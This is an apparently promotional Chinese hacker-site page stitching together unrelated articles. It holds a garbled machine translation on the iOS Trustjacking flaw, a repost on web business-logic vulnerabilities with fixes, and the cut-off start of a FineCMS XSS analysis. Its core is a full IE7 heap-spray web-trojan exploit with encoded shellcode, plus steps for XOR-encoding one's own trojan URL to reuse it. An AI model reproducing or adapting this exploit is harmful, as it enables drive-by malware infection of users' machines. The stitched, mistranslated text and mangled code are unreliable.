中国骇客云iOS trustjacking iPhone远程黑客攻击漏洞详细0day介绍!

Trustjacking

最新IOS的黑客远程攻击漏洞0day  更多关注骇客云平台官网!

赛门铁克的研究人员发现在iPhone用户对设备和Mac工作站和笔记本电脑的漏洞。他们说,攻击者可以利用这个漏洞,他们为Trustjacking接管设备没有手机主人的知识。

在技术层面的安全问题,trustjacking植根于“iTunes Wi-Fi同步”功能,包括iTunes。

如果在iTunes设置启用此选项,当Mac笔记本电脑/工作站的主人同步到他的计算机的一个新的iPhone,这个特点让他在任何时间连接到智能手机通过本地WiFi网络,而是采用有线电缆。

的特点是方便和充足的理由,因为它允许PC用户很容易地检索或发送数据从手机通过iTunes应用程序和API。

iTunes WiFi sync feature

但是,赛门铁克的研究人员说,这个功能的设计是有缺陷的,继续给予计算机所有者获得配对的iPhone通过本地WiFi网络,即使iPhone设备从计算机断开连接。

攻击者可以通过本地WiFi控制iPhone

介绍他们的结果今天在RSA 2018安全大会上,Roy Iarchy、赛门铁克和现代操作系统安全研究主管表示,攻击者可以滥用iTunes Wi-Fi同步功能,把一个后来装置的控制,没有对设备用户可见的指示。

Iarchy说,一旦iTunes无线同步功能是启用的,和一个受害者被诱骗的配对与恶意设备,攻击者可以使用iTunes的API以重复的截图在很短的时间间隔发送截图到iTunes应用程序记录用户的智能手机屏幕。

此外,攻击者还可以安装或删除应用程序,都没有与iPhone用户的任何交互,甚至可以触发一个远程备份,把它发送到他的电脑,后来通过受害者的数据。

社会工程的需要…不需要

显然,这种攻击是不可能的没有社会工程,为iPhone用户仍然需要点击弹出,出现在他的iPhone和同意与攻击者的设备配对。

你会认为这限制了攻击面只有在什么情况下你都很着急,并同意与一个陌生人的笔记本电脑,这样你可以给你的电话你的设备对。

但现实的情况是不同的trustjacking攻击。Iarchy说,恶意软件感染您的Mac笔记本电脑/工作站可以使用自动化脚本“iTunes WiFi同步”功能,然后检索数据或任何感染的配对的iPhone连接到同一WiFi网络。

进一步的攻击,甚至可以在互联网上工作,不仅通过本地WiFi网络,如果Mac电脑是在同一个VPN网络作为配对的iPhone。

赛门铁克说,trustjacking补丁是不完整的

赛门铁克表示,它通知问题的苹果,但苹果的解决方案来解决trustjacking攻击的问题没有请其研究人员。

苹果走的解决方法是向iPhone用户输入手机密码时对计算机。这将防止一些人迅速拿起手机打给自己的笔记本电脑配对。

但是,赛门铁克表示,这个更新了iOS并没有解决iTunes WiFi同步能够检索数据从设备即使在用户从计算机断开连接配对的问题,因为攻击者仍然可以使用iTunes,如果它仍然在默默地连接到智能手机的WiFi范围。

“虽然我们很欣赏的缓解,苹果已经采取了,我们想强调的是它没有解决trustjacking以整体的方式。一旦用户选择信任的电脑受损,利用剩下的继续工作了,”Iarchy说,在今天的博客。

“不幸的是,没有办法列出所有受信任的计算机和撤销访问选择性,”专家说。”确保没有多余的电脑被你的iOS设备的信任的最好的办法是去清洁的可信计算机列表Settings > General > Reset > Reset Location & Privacy现在,您将需要重新授权所有先前连接的电脑,下次你的iOS设备连接到每个设备。”

业务逻辑漏洞-各种平台都有常见逻辑漏洞解析(实战篇)[转载]

一:订单金额任意修改

解析

很多中小型的购物网站都存在这个漏洞。在提交订单的时候抓取数据包或者直接修改前端代码,然后对订单的金额任意修改。

如下图所示:

1.png

2.png

经常见到的参数大多为

rmb

value

amount

cash

fee

money

关于支付的逻辑漏洞这一块还有很多种思路,比如相同价格增加订单数量,相同订单数量减少产品价格,订单价格设定为负数等等。

预防思路

1.订单需要多重效验,如下图所演示。

3.png

2. 订单数值较大时需要人工审核订单信息,如下图所演示。

4.png

3. 我只是提到两个非常简单的预防思路,第二个甚至还有一些不足之处。这里需要根据业务环境的不同总结出自己的预防方式,最好咨询专门的网络安全公司。

二:验证码回传

解析

这个漏洞主要是发生在前端验证处,并且经常发生的位置在于

账号密码找回

账号注册

支付订单等

验证码主要发送途径

邮箱邮件

手机短信

其运行机制如下图所示:

5.png

黑客只需要抓取Response数据包便知道验证码是多少。

预防思路

1.response数据内不包含验证码,验证方式主要采取后端验证,但是缺点是服务器的运算压力也会随之增加。

6.png

2.如果要进行前端验证的话也可以,但是需要进行加密。当然,这个流程图还有一些安全缺陷,需要根据公司业务的不同而进行更改。

7.png

三.未进行登陆凭证验证

解析

有些业务的接口,因为缺少了对用户的登陆凭证的效验或者是验证存在缺陷,导致黑客可以未经授权访问这些敏感信息甚至是越权操作。

常见案例:

1. 某电商后台主页面,直接在管理员web路径后面输入main.php之类的即可进入。

8.png

2. 某航空公司订单ID枚举

9.png

3. 某电子认证中心敏感文件下载

10.png

4.某站越权操作及缺陷,其主要原因是没对ID参数做cookie验证导致。

233.png

5. 实际上还有很多案例,这里就不一一例举了,但是他们都存在一个共同的特性,就是没有对用户的登陆凭证进行效验,如下图为例。

11.png

预防思路

对敏感数据存在的接口和页面做cookie,ssid,token或者其它验证,如下图所示。

12.png

四:接口无限制枚举

解析

有些关键性的接口因为没有做验证或者其它预防机制,容易遭到枚举攻击。

常见案例:

1. 某电商登陆接口无验证导致撞库

13.png

2. 某招聘网验证码无限制枚举

14.png

3. 某快递公司优惠券枚举

15.png

4. 某电商会员卡卡号枚举

16.png

5. 某超市注册用户信息获取

17.png

预防思路

1. 在输入接口设置验证,如token,验证码等。

如果设定验证码,最好不要单纯的采取一个前端验证,最好选择后端验证。

如果设定token,请确保每个token只能采用一次,并且对token设定时间参数。

2. 注册界面的接口不要返回太多敏感信息,以防遭到黑客制作枚举字典。

3. 验证码请不要以短数字来甚至,最好是以字母加数字进行组合,并且验证码需要设定时间期限。

4. 优惠券,VIP卡号请尽量不要存在规律性和简短性,并且优惠券最好是以数字加字母进行组合。

5. 以上这是部分个人建议,实际方案需要参考业务的具体情况。

五:cookie设计存在缺陷

解析

这里需要对其详细的说一下。我们先一个一个来吧。

  1. Cookie的效验值过于简单。有些web对于cookie的生成过于单一或者简单,导致黑客可以对cookie的效验值进行一个枚举,如下图所示

18.png

根据上图,我们可以分析出,这家网站对于cookie的效验只单纯的采用了一组数字,并且数值为常量,不会改变,这样非常容易遭到黑客的枚举。甚至有一些网站做的更简单,直接以用户名,邮箱号或者用户ID等来作为cookie的判断标准。

2. cookie设置存在被盗风险

有很多时候,如果一个用户的cookie被盗取,就算用户怎么修改账号和密码,那段cookie一样有效。详情可以参考《BlackHat(世界黑帽大会)官方APP出现两个逻辑漏洞》

其原理如下:

19.png

国内大部分厂商都不会把这个地方当作安全漏洞来处理,他们认为这个漏洞的利用条件是黑客必须要大批量获取到用户的cookie。虽然事实如此,但是这个也是一个安全隐患。

3.用户的cookie数据加密应严格使用标准加密算法,并注意密钥管理。

有一些厂商为了图方便,没有对用户的cookie做太多的加密工作,仅仅是单纯的做一个静态加密就完事了。我之前就碰到一个,可以为大家还原一下当时的场景。

20.png

当时我看到cookie中有个access token参数,看到value后面是两个等号,习惯性的给丢去base64解码里面,发现解出来后是我的用户名。因此只要知道一个人的用户名就可以伪造对方的cookie,登陆他人账户。

4.还有多个案例不再做重复说明,大家可以深入研究一下cookie中的逻辑漏洞。但是cookie中的漏洞大多都是属于一个越权漏洞。越权漏洞又分为平行越权,垂直越权和交叉越权。

平行越权:权限类型不变,权限ID改变

垂直越权:权限ID不变,权限类型改变

交叉越权:即改变ID,也改变权限

如下图所示:

QQ截图20160824190502.png

预防思路

1.cookie中设定多个验证,比如自如APP的cookie中,需要sign和ssid两个参数配对,才能返回数据。

2.用户的cookie数据加密应严格使用标准加密算法,并注意密钥管理。

3.用户的cookie的生成过程中最好带入用户的密码,一旦密码改变,cookie的值也会改变。

4.cookie中设定session参数,以防cookie可以长时间生效。

5.还有很多方法,不再一一例举,请根据业务不同而思考。

六:找回密码存在设计缺陷

解析

1.auth设计缺陷

经常研究逻辑漏洞的人可能会对以下URL很熟悉

www.xxx.com/resetpassword.php?id=MD5

用户修改密码时,邮箱中会收到一个含有auth的链接,在有效期内用户点击链接,即可进入重置密码环节。而大部分网站对于auth的生成都是采用rand()函数,那么这里就存在一个问题了,Windows环境下rand()最大值为32768,所以这个auth的值是可以被枚举的。

如下面这个代码可以对auth的值做一个字典。

QQ截图20160824161820.png

然后重置某个账号,并且对重置链接内的auth进行枚举

21.png

整个漏洞的运作的流程图如下:

22.png

2.对response做验证

这个漏洞经常出现在APP中,其主要原因是对于重置密码的的验证是看response数据包,由于之前的案例没有截图,只能画个流程图给大家演示一下。

23.png

3.《密码找回逻辑漏洞总结》这篇文章很全面的总结了密码找回漏洞的几个具体思路和分析,这里我就不再继续滚轮子了。

预防思路

1.严格使用标准加密算法,并注意密钥管理。

2.在重置密码的链接上请带入多个安全的验证参数。

七:单纯读取内存值数据来当作用户凭证

解析

实际上这个应该算作一个软件的漏洞,但是因为和web服务器相关,所以也当作WEB的逻辑漏洞来处理了。最能当作例子是《腾讯QQ存在高危漏洞可读取并下载任意用户离线文件(泄漏敏感信息)》这个漏洞,但是我相信这种奇葩的漏洞不一定只有腾讯才有,只是还没人去检测罢了。

产生这个漏洞的主要原因是程序在确定一个用户的登陆凭证的时候主要是依靠内存值中的某个value来进行确认,而不是cookie。但是内存值是可以更改和查看的。其流程图如下:

24.png

预防思路

1. 走服务器端的数据最好做cookie验证。

2. 我不反对直接在进程中确定用户的登陆凭证,但是请对进程进行保护,或者对进程中的value做加密处理。

总结

以上见到的只是几个比较经典的和常见的逻辑漏洞,这些逻辑漏洞也是程序开发人员和安全检测人员需要留意的。

如果对逻辑漏洞感兴趣的可以查看以下的扩展阅读:

2017最新ie0day样本网马修改~

最近流行的最新网马IE70day+shellcode+exe样本已经出来了,刚刚看到,感觉蛮新奇的,毕竟现在还是样本,想把它改成自己的马还得费一番功夫。目前的网马一般改下shellcode就ok了。不过听别人说,如果单纯改shellcode的话,ie会出现崩溃,所以要找到适合得shellcode还是得费一番功夫,不过,有现成的,不用不是浪费么?废话不多说,分析开始。

网马的样本如下更多关注www.hackerschina.org

复制内容到剪贴板

代码:

if(navigator.userAgent.toLowerCase().indexOf(“msie 7”)==-1)location.replace(“about:blank”);

function sleep(milliseconds)

{

var start=new Date().getTime();

for(var i=0;i<1e7;i++)

{if((new Date().getTime()-start)>milliseconds)

{break}

}

}

function spray(sc)

{

var infect=unescape(sc.replace(/dadong/g,”\x25\x75″));

var heapBlockSize=0x100000;

var payLoadSize=infect.length*2;

var szlong=heapBlockSize-(payLoadSize+0x038);

var retVal=unescape(“%u0a0a%u0a0a”);

retVal=getSampleValue(retVal,szlong);

aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize;

zzchuck=new Array();

for(i=0;i<aaablk;i++){zzchuck=retval+infect}< p=””>

}

function getSampleValue(retVal,szlong)

{

while(retVal.length*2<szlong)< p=””>

{retVal+=retVal}

retVal=retVal.substring(0,szlong/2);

return retVal

}

var a1=”dadong”;

spray(a1+”9090″+a1+”dadong9090dadong9090dadongE1D9dadong34D9dadong5824dadong5858dadong3358dadongB3DBdadong031Cdadong31C3dadong66C9dadongE981dadongFA65dadong3080dadong4021dadongFAE2dadong17C9dadong2122dadong4921dadong0121dadong2121dadong214BdadongF1DEdadong2198dadong2131dadongAA21dadongCAD9dadong7F24dadong85D2dadongF1DEdadongD7C9dadongDEDEdadongC9DEdadong221Cdadong2121dadongD9AAdadong19C9dadong2121dadongC921dadong206Cdadong2121dadong67C9dadong2121dadongC921dadong22FAdadong2121dadongD9AAdadong03C9dadong2121dadongC921dadong2065dadong2121dadong11C9dadong2121dadongC921dadong22A8dadong2121dadongD9AAdadong2DC9dadong2121dadongC921dadong2040dadong2121dadong3BC9dadong2121dadongCA21dadong7279dadongFDAAdadong4B72dadong4961dadong3121dadong2121dadongC976dadong2390dadong2121dadongC4C9dadong2121dadong7921dadong72E2dadongFDAAdadong4B72dadong4901dadong3121dadong2121dadongC976dadong23B8dadong2121dadongECC9dadong2121dadong7921dadong76E2dadong1DC9dadong2125dadongAA21dadong12D9dadong68E8dadongE112dadongE291dadongD3DDdadongAC8FdadongDE66dadongE27Edadong1F7Adadong26E7dadong1F99dadong7EA8dadong4720dadongE61Fdadong2466dadongC1DEdadongC8E2dadong25B4dadong2121dadongA07Adadong35CDdadong2120dadongAA21dadong1FF5dadong23E6dadong4C42dadong0145dadongE61Fdadong2563dadong420Edadong0301dadongE3A2dadong1229dadong71E1dadong4971dadong2025dadong2121dadong7273dadongC971dadong22E0dadong2121dadongF1DEdadongDDAAdadongE6AAdadongE1A2dadong1F29dadong39ABdadongFAA5dadong2255dadongCA61dadong1FD7dadong21E7dadong1203dadong1FF3dadong71A9dadongA220dadong75CDdadongE112dadongFA12dadongEDAAdadongD9A2dadong5C75dadong1F28dadong3DA8dadongA220dadong25E1dadongD3CAdadongEDAAdadongF8AAdadongE2A2dadong1231dadong1FE1dadong62E6dadong200Ddadong2121dadong7021dadong7172dadong7171dadong7171dadong7671dadongC971dadong2218dadong2121dadong38C9dadong2121dadong4521dadong2580dadong2121dadongAC21dadong4181dadongDEDEdadongC9DEdadong2216dadong2121dadongFA12dadong7272dadong7272dadongF1DEdadong19A1dadongA1C9dadongC819dadong2E54dadong59A0dadongB124dadongB1B1dadong55B1dadong7427dadongCDAAdadong61ACdadongDE24dadongC9C1dadongDE0FdadongDEDEdadongC9E2dadongDE09dadongDEDEdadong3099dadong2520dadongE3A1dadong212Ddadong3AC9dadongDEDEdadong12DEdadong71E1dadongC975dadong2175dadong2121dadongC971dadong23AAdadong2121dadongF1DEdadongA117dadong051Ddadong5621dadongC92Bdadong2360dadong2121dadongDE12dadongDE76dadongC9F1dadong20DAdadong2121dadongDE49dadong2121dadongDE21dadongC9F1dadongDFC9dadongDEDEdadong7672dadong1277dadong71E1dadongC975dadong213Fdadong2121dadongC971dadong2374dadong2121dadongF1DEdadongA117dadong051Ddadong5621dadongC92Bdadong232Adadong2121dadongDE12dadongDE76dadong79F1dadong7E7FdadongE27Adadong23CAdadongE279dadongD8C9dadongDEDEdadong77DEdadongA276dadong29CDdadongDDAAdadong294Bdadong1F76dadong56DEdadongC935dadong237Cdadong2121dadongF1DEdadongDDAAdadong4049dadong444Cdadong4921dadong6468dadong5367dadongD5AAdadong2998dadong2121dadongD221dadong5487dadong4B0Edadong1F21dadong55DEdadong0105dadong05C9dadong2123dadongDE21dadongAAF1dadongC9D9dadong20EAdadong2121dadongF1DEdadongD91Adadong2955dadongAA17dadong0565dadong1F01dadong21DEdadongDE1Fdadong0555dadongC93Ddadong20CEdadong2121dadongF1DEdadongE5A2dadong7E31dadong997Fdadong2120dadong2121dadong49E2dadong4F4Edadong2121dadong5449dadong4D53dadongCA4CdadongAC34dadong0565dadong7125dadong03C9dadongDEDFdadong71DEdadong6BC9dadong2123dadongC821dadongDFC3dadongDEDEdadongC7C9dadongDEDEdadongA2DEdadong29E5dadong4BE2dadong494Ddadong554Fdadong4D45dadong34CAdadong65ACdadong2505dadongC971dadongDCDAdadongDEDEdadongC971dadong2302dadong2121dadong9AC8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong1249dadong2113dadong4921dadong5254dadong5344dadong34CAdadong65ACdadong2505dadongC971dadongDCF0dadongDEDEdadongC971dadong20D8dadong2121dadongB0C8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong4249dadong5657dadong4921dadong4952dadong4E45dadong34CAdadong65ACdadong2505dadongC971dadongDC86dadongDEDEdadongC971dadong20EEdadong2121dadong46C8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong5749dadong5946dadongCA21dadongAC34dadong0565dadong7125dadongA3C9dadongDEDCdadong71DEdadong8BC9dadong2120dadongC821dadongDF63dadongDEDEdadongC7C9dadongDEDEdadongA2DEdadong25E5dadongC9E2dadong208Adadong2121dadong3A49dadong67E7dadong7158dadongE7C9dadong2120dadongA221dadong29E5dadongC9E2dadong20B6dadong2121dadongCD49dadong22B6dadong712Ddadong93C9dadong2120dadongA221dadong29E5dadongC9E2dadong20A2dadong2121dadong8B49dadong2CDDdadong715DdadongBFC9dadong2120dadongA221dadong29E5dadongC9E2dadong204Edadong2121dadongCC49dadongCE77dadong7117dadongABC9dadong2120dadongA221dadong29E5dadongC9E2dadong207Adadong2121dadongD149dadong25ABdadong717Edadong57C9dadong2120dadongA221dadong29E5dadongC9E2dadongDFD6dadongDEDEdadong5949dadongFA49dadong713Ddadong43C9dadong2120dadongA221dadong29E5dadongC9E2dadong2012dadong2121dadongCE49dadongC1EFdadong7141dadong6FC9dadong2120dadongA221dadong29E5dadongC9E2dadong203Edadong2121dadong9149dadong0C68dadong71FAdadong1BC9dadong2120dadongA221dadong29E5dadongC9E2dadongDE17dadongDEDEdadong8A49dadongBA7Fdadong713Fdadong07C9dadong2120dadongA221dadong29E5dadongC9E2dadongDF86dadongDEDEdadong7849dadongA0B6dadong7123dadong33C9dadong2120dadongA221dadong29E5dadongC9E2dadong21C2dadong2121dadong5F49dadongC3F9dadong7152dadongDFC9dadong2121dadongA221dadong29E5dadongC9E2dadong21EEdadong2121dadongBF49dadong9AD8dadong7114dadongCBC9dadong2121dadongA221dadong29E5dadongC9E2dadongDFB3dadongDEDEdadong7649dadong9481dadong719AdadongF7C9dadong2121dadongA221dadong29E5dadongC9E2dadongDF5FdadongDEDEdadong3B49dadong3F5Bdadong7123dadongE3C9dadong2121dadongA221dadong29E5dadongC9E2dadongDF4BdadongDEDEdadongC149dadong117Adadong71B5dadong8FC9dadong2121dadongA221dadong29E5dadongC9E2dadongDF77dadongDEDEdadongB649dadongC3E8dadong7182dadongBBC9dadong2121dadongA221dadong29E5dadongC9E2dadongDF63dadongDEDEdadong4949dadongE405dadong7192dadongA7C9dadong2121dadongA221dadong29E5dadongC9E2dadong2176dadong2121dadong5349dadong92DFdadong7137dadong53C9dadong2121dadongA221dadong29E5dadongC9E2dadongDF65dadongDEDEdadong32CAdadong444BdadongC971dadongDAD6dadongDEDEdadongC971dadongDF8AdadongDEDEdadong96C8dadongDEDDdadongC9DEdadongDEC9dadongDEDEdadongC9E2dadongDC88dadongDEDEdadong6E49dadong6ECEdadong7124dadong1FC9dadong2121dadongA221dadong29E5dadongC9E2dadong212Edadong2121dadongAF49dadong2F6Fdadong71CDdadong0BC9dadong2121dadongA221dadong29E5dadong12E2dadong45E1dadong61AAdadongA411dadong59E1dadong1F31dadong61AAdadong1F2Ddadong51AAdadong8C3DdadongAA1Fdadong2961dadongCAE2dadong1F2Adadong61AAdadongA215dadong5DE1dadongAA1Fdadong1D61dadong41E2dadongAA17dadong054Ddadong1705dadong64AAdadong171Ddadong75AAdadong5924dadongF422dadongAA1Fdadong396BdadongAA1Fdadong017BdadongFC22dadong1AC2dadong1F68dadong15AAdadong22AAdadong12D4dadong12DEdadongDDE1dadongA58Ddadong55E1dadongE026dadong2CEEdadongD922dadongD5CAdadong1A17dadong055Ddadong5409dadong1FFEdadong7BAAdadong2205dadong47FCdadongAA1Fdadong6A2DdadongAA1Fdadong3D7BdadongFC22dadongAA1FdadongAA25dadongE422dadongA817dadong0565dadong403DdadongC9E2dadongDA47dadongDEDEdadong5549dadong5155dadong0E1Bdadong560Edadong5656dadong430Fdadong4840dadong444Adadong0F42dadong4F42dadong450Edadong564Edadong0E4Fdadong4E4Adadong440Fdadong4459dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong0021″);

sleep(3000);

nav=navigator.userAgent.toLowerCase();

if(navigator.appVersion.indexOf(‘MSIE’)!=-1)

{

version=parseFloat(navigator.appVersion.split(‘MSIE’)[1])

}

if(version==7)

{

w2k3=((nav.indexOf(‘windows nt 5.2’)!=-1)||(nav.indexOf(‘windows 2003’)!=-1));

wxp=((nav.indexOf(‘windows nt 5.1’)!=-1)||(nav.indexOf(‘windows xp’)!=-1));

if(wxp||w2k3)document.write(‘]]>’);

var i=1;while(i<=10)

{

window.status=” “;i++}

}

   

首先,大家肯定会查找shellcode在哪里,这个样本得shellcode刚刚看起来貌似和其他的马有些不同,是

a1+”9090″+a1+”dadong9090dadong9090dadongE1D9dadong34D9dadong5824dadong5858dadong3358dadongB3DBdadong031

的形式,其实明白人一看就出来,这样得加密其实很容易解,解密函数就是sc.replace(/dadong/g,”\x25\x75″)了。

解开之后,shellcode就露出庐山真面目了

复制内容到剪贴板

代码:

u9090%u%u9090%u9090%uE1D9%u34D9%u5824%u5858%u3358%uB3DB%u031C%u31C3%u66C9%uE981%uFA65%u3080%u4021%uFAE2%u17C9%u2122%u4921%u0121%u2121%u214B%uF1DE%u2198%u2131%uAA21%uCAD9%u7F24%u85D2%uF1DE%uD7C9%uDEDE%uC9DE%u221C%u2121%uD9AA%u19C9%u2121%uC921%u206C%u2121%u67C9%u2121%uC921%u22FA%u2121%uD9AA%u03C9%u2121%uC921%u2065%u2121%u11C9%u2121%uC921%u22A8%u2121%uD9AA%u2DC9%u2121%uC921%u2040%u2121%u3BC9%u2121%uCA21%u7279%uFDAA%u4B72%u4961%u3121%u2121%uC976%u2390%u2121%uC4C9%u2121%u7921%u72E2%uFDAA%u4B72%u4901%u3121%u2121%uC976%u23B8%u2121%uECC9%u2121%u7921%u76E2%u1DC9%u2125%uAA21%u12D9%u68E8%uE112%uE291%uD3DD%uAC8F%uDE66%uE27E%u1F7A%u26E7%u1F99%u7EA8%u4720%uE61F%u2466%uC1DE%uC8E2%u25B4%u2121%uA07A%u35CD%u2120%uAA21%u1FF5%u23E6%u4C42%u0145%uE61F%u2563%u420E%u0301%uE3A2%u1229%u71E1%u4971%u2025%u2121%u7273%uC971%u22E0%u2121%uF1DE%uDDAA%uE6AA%uE1A2%u1F29%u39AB%uFAA5%u2255%uCA61%u1FD7%u21E7%u1203%u1FF3%u71A9%uA220%u75CD%uE112%uFA12%uEDAA%uD9A2%u5C75%u1F28%u3DA8%uA220%u25E1%uD3CA%uEDAA%uF8AA%uE2A2%u1231%u1FE1%u62E6%u200D%u2121%u7021%u7172%u7171%u7171%u7671%uC971%u2218%u2121%u38C9%u2121%u4521%u2580%u2121%uAC21%u4181%uDEDE%uC9DE%u2216%u2121%uFA12%u7272%u7272%uF1DE%u19A1%uA1C9%uC819%u2E54%u59A0%uB124%uB1B1%u55B1%u7427%uCDAA%u61AC%uDE24%uC9C1%uDE0F%uDEDE%uC9E2%uDE09%uDEDE%u3099%u2520%uE3A1%u212D%u3AC9%uDEDE%u12DE%u71E1%uC975%u2175%u2121%uC971%u23AA%u2121%uF1DE%uA117%u051D%u5621%uC92B%u2360%u2121%uDE12%uDE76%uC9F1%u20DA%u2121%uDE49%u2121%uDE21%uC9F1%uDFC9%uDEDE%u7672%u1277%u71E1%uC975%u213F%u2121%uC971%u2374%u2121%uF1DE%uA117%u051D%u5621%uC92B%u232A%u2121%uDE12%uDE76%u79F1%u7E7F%uE27A%u23CA%uE279%uD8C9%uDEDE%u77DE%uA276%u29CD%uDDAA%u294B%u1F76%u56DE%uC935%u237C%u2121%uF1DE%uDDAA%u4049%u444C%u4921%u6468%u5367%uD5AA%u2998%u2121%uD221%u5487%u4B0E%u1F21%u55DE%u0105%u05C9%u2123%uDE21%uAAF1%uC9D9%u20EA%u2121%uF1DE%uD91A%u2955%uAA17%u0565%u1F01%u21DE%uDE1F%u0555%uC93D%u20CE%u2121%uF1DE%uE5A2%u7E31%u997F%u2120%u2121%u49E2%u4F4E%u2121%u5449%u4D53%uCA4C%uAC34%u0565%u7125%u03C9%uDEDF%u71DE%u6BC9%u2123%uC821%uDFC3%uDEDE%uC7C9%uDEDE%uA2DE%u29E5%u4BE2%u494D%u554F%u4D45%u34CA%u65AC%u2505%uC971%uDCDA%uDEDE%uC971%u2302%u2121%u9AC8%uDEDF%uC9DE%uDEC7%uDEDE%uE5A2%uE229%u1249%u2113%u4921%u5254%u5344%u34CA%u65AC%u2505%uC971%uDCF0%uDEDE%uC971%u20D8%u2121%uB0C8%uDEDF%uC9DE%uDEC7%uDEDE%uE5A2%uE229%u4249%u5657%u4921%u4952%u4E45%u34CA%u65AC%u2505%uC971%uDC86%uDEDE%uC971%u20EE%u2121%u46C8%uDEDF%uC9DE%uDEC7%uDEDE%uE5A2%uE229%u5749%u5946%uCA21%uAC34%u0565%u7125%uA3C9%uDEDC%u71DE%u8BC9%u2120%uC821%uDF63%uDEDE%uC7C9%uDEDE%uA2DE%u25E5%uC9E2%u208A%u2121%u3A49%u67E7%u7158%uE7C9%u2120%uA221%u29E5%uC9E2%u20B6%u2121%uCD49%u22B6%u712D%u93C9%u2120%uA221%u29E5%uC9E2%u20A2%u2121%u8B49%u2CDD%u715D%uBFC9%u2120%uA221%u29E5%uC9E2%u204E%u2121%uCC49%uCE77%u7117%uABC9%u2120%uA221%u29E5%uC9E2%u207A%u2121%uD149%u25AB%u717E%u57C9%u2120%uA221%u29E5%uC9E2%uDFD6%uDEDE%u5949%uFA49%u713D%u43C9%u2120%uA221%u29E5%uC9E2%u2012%u2121%uCE49%uC1EF%u7141%u6FC9%u2120%uA221%u29E5%uC9E2%u203E%u2121%u9149%u0C68%u71FA%u1BC9%u2120%uA221%u29E5%uC9E2%uDE17%uDEDE%u8A49%uBA7F%u713F%u07C9%u2120%uA221%u29E5%uC9E2%uDF86%uDEDE%u7849%uA0B6%u7123%u33C9%u2120%uA221%u29E5%uC9E2%u21C2%u2121%u5F49%uC3F9%u7152%uDFC9%u2121%uA221%u29E5%uC9E2%u21EE%u2121%uBF49%u9AD8%u7114%uCBC9%u2121%uA221%u29E5%uC9E2%uDFB3%uDEDE%u7649%u9481%u719A%uF7C9%u2121%uA221%u29E5%uC9E2%uDF5F%uDEDE%u3B49%u3F5B%u7123%uE3C9%u2121%uA221%u29E5%uC9E2%uDF4B%uDEDE%uC149%u117A%u71B5%u8FC9%u2121%uA221%u29E5%uC9E2%uDF77%uDEDE%uB649%uC3E8%u7182%uBBC9%u2121%uA221%u29E5%uC9E2%uDF63%uDEDE%u4949%uE405%u7192%uA7C9%u2121%uA221%u29E5%uC9E2%u2176%u2121%u5349%u92DF%u7137%u53C9%u2121%uA221%u29E5%uC9E2%uDF65%uDEDE%u32CA%u444B%uC971%uDAD6%uDEDE%uC971%uDF8A%uDEDE%u96C8%uDEDD%uC9DE%uDEC9%uDEDE%uC9E2%uDC88%uDEDE%u6E49%u6ECE%u7124%u1FC9%u2121%uA221%u29E5%uC9E2%u212E%u2121%uAF49%u2F6F%u71CD%u0BC9%u2121%uA221%u29E5%u12E2%u45E1%u61AA%uA411%u59E1%u1F31%u61AA%u1F2D%u51AA%u8C3D%uAA1F%u2961%uCAE2%u1F2A%u61AA%uA215%u5DE1%uAA1F%u1D61%u41E2%uAA17%u054D%u1705%u64AA%u171D%u75AA%u5924%uF422%uAA1F%u396B%uAA1F%u017B%uFC22%u1AC2%u1F68%u15AA%u22AA%u12D4%u12DE%uDDE1%uA58D%u55E1%uE026%u2CEE%uD922%uD5CA%u1A17%u055D%u5409%u1FFE%u7BAA%u2205%u47FC%uAA1F%u6A2D%uAA1F%u3D7B%uFC22%uAA1F%uAA25%uE422%uA817%u0565%u403D%uC9E2%uDA47%uDEDE%u5549%u5155%u0E1B%u560E%u5656%u430F%u4840%u444A%u0F42%u4F42%u450E%u564E%u0E4F%u4E4A%u440F%u4459%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u0021有了shellcode,下一步就是抄家伙分析了,首先把shellcode转换成exe文件,用OD载入

单步跟踪,到如下位置的时候注意了

如图所示

 

XOR BYTE PIR DS:[EAX],21

这个是负责shellcode解密得函数了,由于shellcode用的是异或加密,并且从这里可以看出密钥是21,这就好办啦~~~

我们把shellcode的 复制内容到剪贴板 代码:%u5549%u5155%u0E1B%u560E%u5656%u430F%u4840%u444A%u0F42%u4F42%u450E%u564E%u0E4F%u4E4A%u440F%u4459%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u0021

 

知道了以上这些原理,把这个网马改成自己得马就简单了!

我们只要把自己马的地址用21异或运算,并且转换成unicode替换原来的那些,并且按照原理得方法加密unicode,网马的改造就算完成了!!!

知道了道理,写生成器也就不是什么难事了~~~

最新0day漏洞之FineCMS一个XSS漏洞

FineCMS一个XSS漏洞分析

FineCMS是一套用CodeIgniter开发的中小型内容管理系统,目前有三个分支:1.x,2.x,5.x,这次分析的是2.x的最新版2.1.5

一、用户输入
既然是XSS,那么就一定有用户的输入以及输出。

// controllers\member\InfoController.php
public function avatarAction() {
    if (empty($this->memberconfig['avatar']) && $this->isPostForm()) {
        $data = $this->input->post('data', TRUE);
        $this->member->update(array('avatar'=> $data['avatar']), 'id=' . $this->memberinfo['id']);
        $this->memberMsg(lang('success'), url('member/info/avatar'), 1);
    }
    $this->view->assign(array(
        'avatar_ext_path' => EXT_PATH . 'avatar/',
        'avatar_return'   => (url('member/info/uploadavatar')),
